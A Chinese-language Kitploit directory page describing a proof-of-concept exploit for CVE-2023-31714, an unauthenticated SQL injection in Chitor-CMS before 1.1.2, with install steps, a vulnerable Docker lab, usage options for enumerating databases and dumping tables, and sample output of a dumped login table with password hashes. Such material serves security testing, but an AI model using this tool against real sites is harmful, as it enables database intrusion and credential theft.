Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/msd0pe-1/cve-2023-31714
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试数据库安全
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

针对CVE-2023-31714的概念验证漏洞利用代码,该漏洞是Chitor-CMS < 1.1.2中一个未经验证的SQL注入漏洞。通过/edit_school.php端点自动执行数据库枚举和凭证转储。

查看仓库
125个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-31714 - Chitor-CMS < 1.1.2 预认证 SQL 注入

发现者:msd0pe
https://github.com/waqaskanju/Chitor-CMS
项目作者:waqaskanju

chitor1.1.py(自 69d3442 提交起已修补)

2023/04/13
在 /edit_school.php?id= 端点中发现了 SQL 注入,且无需任何身份验证。

chitor1.0.py(自 5f76192 提交起变为认证后 SQL 注入)

2023/04/09
在多个端点(例如 /add_school_class.php?school=)中发现了 SQL 注入,且无需任何身份验证。自 5f76192 提交起,这些端点会验证登录用户是否具有编辑权限。这一检查之前也已存在,但并未生效。

安装

root@kitploit:~
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

启动易受攻击的 Docker:
  - sudo ./run.sh [1.0|1.1]
停止并清理 Docker:
  - sudo ./clean.sh

使用方法

root@kitploit:~
用法:python chitor1.1.py [选项]

选项:
  --version             显示程序版本号并退出
  -h, --help            显示此帮助信息并退出
  -u URL, --url=URL     目标 URL
  --dbs                 列出数据库
  -D DATABASE, --db=DATABASE
                        选择一个数据库
  --tables              列出表
  -T TABLE, --table=TABLE
                        选择一个表
  --dump                导出内容

  示例:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 预认证 SQL 注入。
  源代码由 msd0pe 置于公共领域,无版权。
  任何恶意或非法活动都有可能受到法律制裁。
  使用风险自负。

示例

root@kitploit:~
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
下载工具